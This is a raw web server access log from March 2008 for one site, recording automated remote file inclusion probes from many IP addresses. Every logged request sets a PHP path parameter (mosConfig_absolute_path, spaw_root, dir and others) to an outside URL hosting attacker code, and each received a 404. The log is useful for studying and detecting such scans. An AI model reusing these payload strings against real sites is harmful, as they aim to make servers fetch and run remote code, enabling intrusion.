66.70.88.210 - - [23/Mar/2008:05:00:08 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.88.210 - - [23/Mar/2008:05:00:08 -0700] "GET //skin/zero_vote/error.php?dir=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.70.88.210 - - [23/Mar/2008:05:00:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:00:21 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:00:22 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.15.10 - - [23/Mar/2008:05:00:23 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.7 - - [23/Mar/2008:05:00:35 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.7 - - [23/Mar/2008:05:00:35 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:05:01:07 -0700] "GET /logs/access_080223.log/index.php?body=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:05:01:07 -0700] "GET /index.php?body=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:05:01:08 -0700] "GET /logs/index.php?body=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:01:55 -0700] "GET /logs/access_080228.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:01:55 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:01:55 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:05:01:58 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:02 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:04 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:06 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:09 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:09 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:14 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:15 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:15 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:18 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:20 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:22 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.24.50.200 - - [23/Mar/2008:05:02:24 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:25 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:29 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [23/Mar/2008:05:02:34 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:02:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.76.205 - - [23/Mar/2008:05:02:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:02:48 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:02:49 -0700] "GET //skin/zero_vote/error.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:02:49 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:02:49 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:02:51 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:02:51 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:02:51 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:02 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:03 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:04 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:05 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:09 -0700] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:09 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:09 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:03:10 -0700] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:03:10 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:03:10 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:03:12 -0700] "GET /logs/access_080119.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:03:12 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:03:12 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:13 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:14 -0700] "GET /logs/access_080124.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:19 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:20 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:03:20 -0700] "GET /logs/access_080124.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:24 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:30 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:31 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:31 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:33 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:03:34 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:34 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.114.4 - - [23/Mar/2008:05:03:34 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.85.114.4 - - [23/Mar/2008:05:03:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
209.85.114.4 - - [23/Mar/2008:05:03:34 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
209.85.114.4 - - [23/Mar/2008:05:03:34 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:36 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:37 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:41 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:41 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.202.247.246 - - [23/Mar/2008:05:03:41 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:41 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.202.247.246 - - [23/Mar/2008:05:03:41 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:42 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.202.247.246 - - [23/Mar/2008:05:03:42 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.202.247.246 - - [23/Mar/2008:05:03:42 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:03:44 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:05:03:45 -0700] "GET /logs/access_080225.log/index.php?body=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:03:46 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:48 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:54 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:55 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:55 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:56 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.201.81.6 - - [23/Mar/2008:05:03:57 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.226.180 - - [23/Mar/2008:05:03:58 -0700] "GET /index.php?body=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:03:58 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:03:59 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:03:59 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:04:03 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:04:04 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:04:04 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.166.115 - - [23/Mar/2008:05:04:07 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:04:08 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:04:12 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:04:12 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:04:12 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:04:12 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:04:12 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.246.151.78 - - [23/Mar/2008:05:04:13 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.73.168 - - [23/Mar/2008:05:04:13 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:04:15 -0700] "GET //modules/xfsection/modify.php?dir_module=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:05:04:15 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:04:16 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:05:04:17 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:05:04:18 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
65.98.59.114 - - [23/Mar/2008:05:04:18 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.223.44 - - [23/Mar/2008:05:04:18 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
62.44.73.116 - - [23/Mar/2008:05:04:19 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
